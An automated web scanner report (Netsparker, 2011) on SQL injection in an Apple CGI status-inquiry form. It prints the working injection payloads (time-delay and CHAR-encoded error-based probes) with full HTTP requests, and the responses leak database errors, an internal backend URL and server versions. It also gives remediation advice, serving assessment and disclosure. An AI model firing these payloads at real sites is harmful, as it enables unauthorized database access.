Blind SQL Injection, CWE-89, CAPEC-66, wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Netsparker - Scan Report Summary
TARGET URL: http://wsidecar.apple.com/cgi-bin/upgrade_que...
SCAN DATE: 9/27/2011 8:37:55 PM
REPORT DATE: 10/3/2011 8:47:47 PM
SCAN DURATION: 00:31:54

Total Requests

Average Speed

req/sec.
11 identified
3 confirmed
6 critical
2 informational

SCAN SETTINGS

PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

CRITICAL: 55 %
LOW: 27 %
INFORMATION: 18 %

VULNERABILITY SUMMARY

| URL | Parameter | Method | Vulnerability | Confirmed |
|---|---|---|---|---|
| /cgi-bin/upgrade_query/query.pl | promoid | POST | Blind SQL Injection | Yes |
| | promoid | POST | Blind SQL Injection | Yes |
| | promoid | POST | [Probable] SQL Injection | No |
| | promoid | POST | [Probable] SQL Injection | No |
| | zip | POST | [Probable] SQL Injection | No |
| | zip | POST | [Probable] SQL Injection | No |
| | | | Apache Version Disclosure | No |
| | | | PHP Version Disclosure | No |
| | promoid | POST | Database Error Message | No |
| | | | Microsoft SQL Server Identified | Yes |
| | | | Apache Version Is Out Of Date | No |

Blind SQL Injection

2 TOTAL (CRITICAL), 2 CONFIRMED

SQL Injection occurs when data input, for example by a user, is interpreted as a SQL command rather than as normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database. In these tests, SQL Injection was not obvious, but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following types of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most ORM systems use only parameterised queries, and this can solve the whole SQL Injection problem.
  3. Locate all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack on this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

Classification

OWASP A1, PCI v1.2-6.5.2, PCI v2.0-6.5.1, CWE-89, CAPEC-66, WASC-19

/cgi-bin/upgrade_query/query.pl CONFIRMED

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

| Parameter | Type | Value |
|---|---|---|
| promoid | POST | ';WAITFOR DELAY '0:0:25'-- |
| company | POST | 3 |
| firstname | POST | Smith |
| lastname | POST | Smith |
| zip | POST | 3 |
| email | POST | netsparker@example.com |
| submit | POST | Check Status |

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 166
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid=%27;WAITFOR%20DELAY%20%270:0:25%27--&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:46 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4126
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%3BWAITFOR%20DELAY%20%270%3A0%3A25%27%2D%2D&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL">
<table width="430" border="0">

<tr>
<td width=400><font color=red><b>No records matched your search criteria.</b></font></td>
</tr>

</table>
<BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>

/cgi-bin/upgrade_query/query.pl CONFIRMED

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

| Parameter | Type | Value |
|---|---|---|
| promoid | POST | ';WAITFOR DELAY '0:0:25'-- |
| company | POST | 3 |
| firstname | POST | Smith |
| lastname | POST | Smith |
| zip | POST | 3 |
| email | POST | netsparker@example.com |

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 122
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid=%27;WAITFOR%20DELAY%20%270:0:25%27--&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:38:27 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4126
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%3BWAITFOR%20DELAY%20%270%3A0%3A25%27%2D%2D&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL">
<table width="430" border="0">

<tr>
<td width=400><font color=red><b>No records matched your search criteria.</b></font></td>
</tr>

</table>
<BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>

[Probable] SQL Injection

4 TOTAL (CRITICAL)

SQL Injection occurs when data input, for example by a user, is interpreted as a SQL command rather than as normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Although Netsparker believes that there is a SQL Injection here, it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us so that we can address it and give you a more precise result next time.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following types of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture, consider its benefits and implement one if appropriate. As a minimum, the use of a DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries, and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

Classification

OWASP A1, PCI v1.2-6.5.2, PCI v2.0-6.5.1, CWE-89, CAPEC-66, WASC-19

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

| Parameter | Type | Value |
|---|---|---|
| promoid | POST | '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' |
| company | POST | 3 |
| firstname | POST | Smith |
| lastname | POST | Smith |
| zip | POST | 3 |
| email | POST | netsparker@example.com |
| submit | POST | Check Status |

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 306
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:38:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4457
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%2B%20%28select%20convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%20FROM%20syscolumns%29%20%2B%27&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Line 1: Incorrect syntax near '+'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a 
href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

| Parameter | Type | Value |
|---|---|---|
| promoid | POST | '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' |
| company | POST | 3 |
| firstname | POST | Smith |
| lastname | POST | Smith |
| zip | POST | 3 |
| email | POST | netsparker@example.com |

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 262
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:40:23 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4457
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" 
value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%2B%20%28select%20convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%20FROM%20syscolumns%29%20%2B%27&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Line 1: Incorrect syntax near '+'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a 
href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

| Parameter | Type | Value |
|---|---|---|
| company | POST | 3 |
| firstname | POST | Smith |
| lastname | POST | Smith |
| zip | POST | 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+' |
| email | POST | netsparker@example.com |

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 215
Expect: 100-continue
Accept-Encoding: gzip, deflate

company=3&firstname=Smith&lastname=Smith&zip='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:53:16 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4223
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1726


